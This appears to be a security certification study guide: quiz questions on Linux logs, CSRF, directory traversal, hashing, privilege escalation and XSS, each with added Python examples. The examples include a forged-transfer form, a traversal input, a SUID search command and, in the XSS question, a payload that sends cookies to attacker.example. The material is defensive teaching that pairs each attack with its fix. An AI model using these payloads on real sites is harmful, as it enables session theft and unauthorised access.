Question 1
(B1, Pg135) In which directory are Linux logs generally found?
A) var
B) bin
C) boot
D) mnt
HINT The "blank" folder contains system files that tend to increase in size over time (hence it's a "blank" size folder). Things
like log files, the mail directory, and so on, go here.
Correct Answer
var (log files normally live under /var/log)
Page 1 of 73
Question 2
(B3, Pg169) What is a requirement for cross-site request forgery to work?
A) The victim must be authenticated with the target site
B) The attacker must have root privileges on the victim's system
C) The victim must be a member of the IIS_USER group
D) The attacker must steal the victim's cookie
HINT CSRF involves an authenticated user clicking on a link (or loading a page) that an attacker plants. The victim's
browser automatically attaches its cookies for the target site to the forged request, so the action is performed with the
victim's authenticated session. The attacker never needs the cookie value itself, only a victim who is logged in.
Correct Answer
The victim must be authenticated with the target site
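The following is an added example, not code from the study guide or the book it cites. It models a bank transfer endpoint in two versions: one that trusts the session cookie alone (the forged POST from the attacker's auto-submitting form succeeds because the victim is authenticated) and one that also checks a per-session synchronizer token, which the attacker's page cannot read. The endpoint, session store, host names and handler names are all illustrative.

```python
# Added example (not from the study guide): an authenticated session is all a
# CSRF attack needs, and a synchronizer token is what breaks it.
# SESSIONS, BALANCES and the handler names are illustrative, not a real framework.
import hmac
import secrets

# Constructed server state: session id -> logged-in user and that session's CSRF token.
SESSIONS = {
    "sess-1234": {"user": "alice", "csrf_token": secrets.token_hex(16)},
}
BALANCES = {"alice": 100, "mallory": 0}

# The attacker's page: an auto-submitting form. When the victim loads it, the
# browser POSTs to bank.example and attaches the victim's cookie for that site.
ATTACKER_HTML = """<form id="f" action="https://bank.example/transfer" method="POST">
  <input type="hidden" name="to" value="mallory">
  <input type="hidden" name="amount" value="100">
</form><script>document.getElementById("f").submit();</script>"""


def handle_transfer_vulnerable(cookies, form):
    """Vulnerable: trusts the session cookie alone, so a cross-site POST works."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not logged in"
    BALANCES[session["user"]] -= int(form["amount"])
    BALANCES[form["to"]] += int(form["amount"])
    return 200, "ok"


def handle_transfer_hardened(cookies, form):
    """Hardened: also requires a per-session token the attacker's page cannot know."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not logged in"
    supplied = form.get("csrf_token", "")
    # Constant-time comparison; a missing or wrong token is rejected.
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    BALANCES[session["user"]] -= int(form["amount"])
    BALANCES[form["to"]] += int(form["amount"])
    return 200, "ok"


# The same forged request against both handlers: the browser supplies the
# victim's cookie, but the attacker's HTML cannot include alice's token.
FORGED_COOKIES = {"session": "sess-1234"}
FORGED_FORM = {"to": "mallory", "amount": "100"}


def demo():
    BALANCES.update({"alice": 100, "mallory": 0})
    vuln = handle_transfer_vulnerable(FORGED_COOKIES, FORGED_FORM)
    after_vuln = dict(BALANCES)
    BALANCES.update({"alice": 100, "mallory": 0})
    hard = handle_transfer_hardened(FORGED_COOKIES, FORGED_FORM)
    after_hard = dict(BALANCES)
    # A legitimate form rendered by the site carries the token and still works.
    legit_form = dict(FORGED_FORM, csrf_token=SESSIONS["sess-1234"]["csrf_token"])
    legit = handle_transfer_hardened(FORGED_COOKIES, legit_form)
    return vuln, after_vuln, hard, after_hard, legit


if __name__ == "__main__":
    print(demo())
```

Note that the forged request carries a valid cookie in both cases; the only thing the attacker lacks is the token, which is why option D (stealing the cookie) is not a requirement and option A is.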
Question 3
(B3, Pg173) What is the best way to mitigate a directory traversal attack?
Correct Answer
Do not use user input directly when making file system calls: map user-supplied values to server-chosen paths, or, where
a name must be accepted, canonicalize it and confirm the result stays inside the intended directory.
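An added example, not from the study guide, showing the vulnerable pattern next to the two mitigations the answer describes. A constructed download directory holds one public file, with a secret file outside it standing in for /etc/passwd; the function names and the allowlist are illustrative.

```python
# Added example (not from the study guide): serving files from a download
# directory. The vulnerable version passes user input straight into the path;
# the hardened versions keep user input out of the file system call (allowlist)
# or canonicalize it and check containment (realpath fallback).
import os
import tempfile

# Constructed sandbox: a downloads dir with one public file, and a secret
# outside it that plays the role of /etc/passwd.
ROOT = tempfile.mkdtemp()
DOWNLOADS = os.path.join(ROOT, "downloads")
os.mkdir(DOWNLOADS)
with open(os.path.join(DOWNLOADS, "report.txt"), "w") as f:
    f.write("public report")
with open(os.path.join(ROOT, "secret.txt"), "w") as f:
    f.write("root:x:0:0")

# Allowlist: opaque ids the user may request, mapped to server-chosen names.
FILE_IDS = {"1": "report.txt"}


def read_vulnerable(user_path):
    """Vulnerable: '../secret.txt' escapes DOWNLOADS because join() trusts the input."""
    with open(os.path.join(DOWNLOADS, user_path)) as f:
        return f.read()


def read_by_id(file_id):
    """Hardened (preferred): the user picks an id, the server picks the path."""
    name = FILE_IDS.get(file_id)
    if name is None:
        raise PermissionError("unknown file id")
    with open(os.path.join(DOWNLOADS, name)) as f:
        return f.read()


def read_contained(user_path):
    """Hardened (fallback when a name must be accepted): resolve '..' and
    symlinks with realpath, then require the result to stay under DOWNLOADS.
    Absolute input such as '/etc/passwd' is also rejected, because join()
    discards the base for an absolute second argument."""
    base = os.path.realpath(DOWNLOADS)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes download directory")
    with open(target) as f:
        return f.read()
```

The allowlist form is the stronger of the two because no user-controlled string ever reaches open(); the realpath check is the fallback for legacy endpoints that must accept a file name.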
Question 4
(B3, Pg22) Which of the following is a form of one-way encryption?
A) Hashing
B) Symmetric
C) Substitution
D) Asymmetric
HINT "Blank" is a third form of encryption, but its uses are a bit more niche. The third form of encryption is called hashing:
a form of one-way encryption. That means that once data is hashed, the process can not be reversed to go from the hash
back to the plaintext. (Strictly speaking, hashing is not encryption at all: there is no key and nothing to decrypt. A hash is
checked by recomputing it over the data and comparing, never by reversing it.)
There are some properties of hashing that make it incredibly useful. The same plaintext put through the same hashing
algorithm will always produce the same hash. However, if even one bit of the plaintext is changed, the resulting
hash will be completely different. Similarly, with a good hashing algorithm, it is computationally infeasible to find two
different pieces of plaintext that work out to the same hash (collision resistance).
Correct Answer
Hashing
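An added example, not from the study guide, that checks the properties the hint lists using SHA-256 from the Python standard library: the same input always gives the same digest, a one-bit change in the input gives an unrelated digest, and verification works by recomputing rather than reversing. The message and helper names are illustrative.

```python
# Added example (not from the study guide): the properties of a cryptographic
# hash, demonstrated with SHA-256. Helper names are illustrative.
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """One-way digest: cheap to compute from data, infeasible to invert."""
    return hashlib.sha256(data).hexdigest()


def differing_bits(hex_a: str, hex_b: str) -> int:
    """Hamming distance between two equal-length hex digests."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def flip_one_bit(data: bytes) -> bytes:
    """Return data with the lowest bit of its last byte inverted."""
    return data[:-1] + bytes([data[-1] ^ 0x01])


def verify(data: bytes, stored_digest: str) -> bool:
    """Integrity check: recompute and compare in constant time. There is no
    'decrypt' step, which is what one-way means in practice."""
    return hmac.compare_digest(sha256_hex(data), stored_digest)


def demo():
    msg = b"The quick brown fox"            # constructed sample input
    d1 = sha256_hex(msg)
    d2 = sha256_hex(msg)                    # same input -> same 256-bit digest
    d3 = sha256_hex(flip_one_bit(msg))      # one-bit change -> roughly half the bits differ
    return d1 == d2, differing_bits(d1, d3), verify(msg, d1), verify(flip_one_bit(msg), d1)
```

For a good hash the second value returned by demo() lands near 128 of 256 bits, the avalanche behaviour the hint describes; a digest that changed in only a few bits would indicate a broken function.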
Question 5
What are some of the ways to perform privilege escalation?
A) Exploiting Services
B) Exploiting the Kernel
C) SUID Files
D) All of the above
Correct Answer
All of the above
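An added example, not from the study guide, for the "SUID files" answer: the enumeration step that finds setuid executables, which is the same check as `find / -perm -4000 -type f 2>/dev/null` on a real host. It builds a small constructed directory tree so it runs without root and without touching the system; the paths and file names are illustrative.

```python
# Added example (not from the study guide): enumerate setuid files, the
# starting point for the SUID privilege-escalation technique. Equivalent shell:
#   find / -perm -4000 -type f 2>/dev/null
import os
import stat
import tempfile


def find_setuid_files(root):
    """Walk root and return sorted (path, owner_uid) pairs for regular files
    carrying the setuid bit. Symlinks are not followed, so a planted link
    cannot redirect the walk or double count a target."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; skip rather than abort the scan
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid))
    return sorted(found)


def demo():
    """Constructed tree: one setuid file and one ordinary file."""
    root = tempfile.mkdtemp()
    suid = os.path.join(root, "bin", "helper")
    plain = os.path.join(root, "bin", "normal")
    os.mkdir(os.path.dirname(suid))
    for p in (suid, plain):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)   # rwsr-xr-x: setuid bit set
    os.chmod(plain, 0o755)   # rwxr-xr-x: no setuid bit
    return [os.path.basename(p) for p, _ in find_setuid_files(root)]


if __name__ == "__main__":
    for path, uid in find_setuid_files("/usr"):
        print(uid, path)
```

On a real system the interesting hits are root-owned (uid 0) binaries that are not part of the distribution's expected set; a file system mounted nosuid ignores the bit at exec time, so a hit there is not exploitable even though the scan reports it.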
Question 6
(B3, Pg162) Which of the following is a common result of a reflected cross-site scripting attack?
A) Tricking a user into making an authenticated transaction
B) Sending a website user's session cookie to an attacker
C) Embedding the attacker's malware in web application source code
D) Stealing password hashes from a website's back end database
HINT It may be under the session guessing section, but if you read further into it, you will see where it mentions the XSS
attack. Reflected XSS runs attacker-supplied script inside a page from the target's own origin, so the script can read
document.cookie (unless the cookie is HttpOnly) and send it to the attacker.
Correct Answer
Sending a website user's session cookie to an attacker
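An added example, not from the study guide, modelling the reflected XSS described in the answer: a search page echoes its query parameter into the HTML, the attacker's link carries a script that ships document.cookie to the attacker's host, and the hardened version output-encodes the parameter and marks the session cookie HttpOnly. The host names, handler names and the crude "would this execute" check are illustrative; a real browser is the only authoritative judge.

```python
# Added example (not from the study guide): a reflected XSS sink, the cookie
# theft payload, and the two controls that defeat it. Names are illustrative.
import html
from urllib.parse import parse_qs, quote, urlparse

# Constructed attacker link. The payload sends the victim's cookies to the
# attacker's server; it is URL-encoded exactly as it would be in a real link.
PAYLOAD = "<script>location='http://attacker.example/?c='+document.cookie</script>"
ATTACK_URL = "https://shop.example/search?q=" + quote(PAYLOAD, safe="")


def _query_param(url, name):
    """Extract one query parameter the way a server framework would."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def search_vulnerable(url):
    """Reflects q into the page unescaped, so the payload runs in the victim's
    browser with the site's origin and can read its cookies."""
    q = _query_param(url, "q")
    headers = {"Set-Cookie": "session=abc123"}
    return headers, f"<h1>Results for {q}</h1>"


def search_hardened(url):
    """Output-encodes q so the browser renders it as text, and marks the
    session cookie HttpOnly so script cannot read it even if another sink is missed."""
    q = _query_param(url, "q")
    headers = {"Set-Cookie": "session=abc123; HttpOnly; Secure; SameSite=Lax"}
    return headers, f"<h1>Results for {html.escape(q)}</h1>"


def script_executes(body: str) -> bool:
    """Crude stand-in for the browser: a literal <script> tag in the HTML would run."""
    return "<script>" in body
```

The escape belongs at the output (HTML context), not at input, because the same value may be reflected into attribute, JavaScript or URL contexts that need different encodings; HttpOnly is defence in depth, not a substitute for encoding.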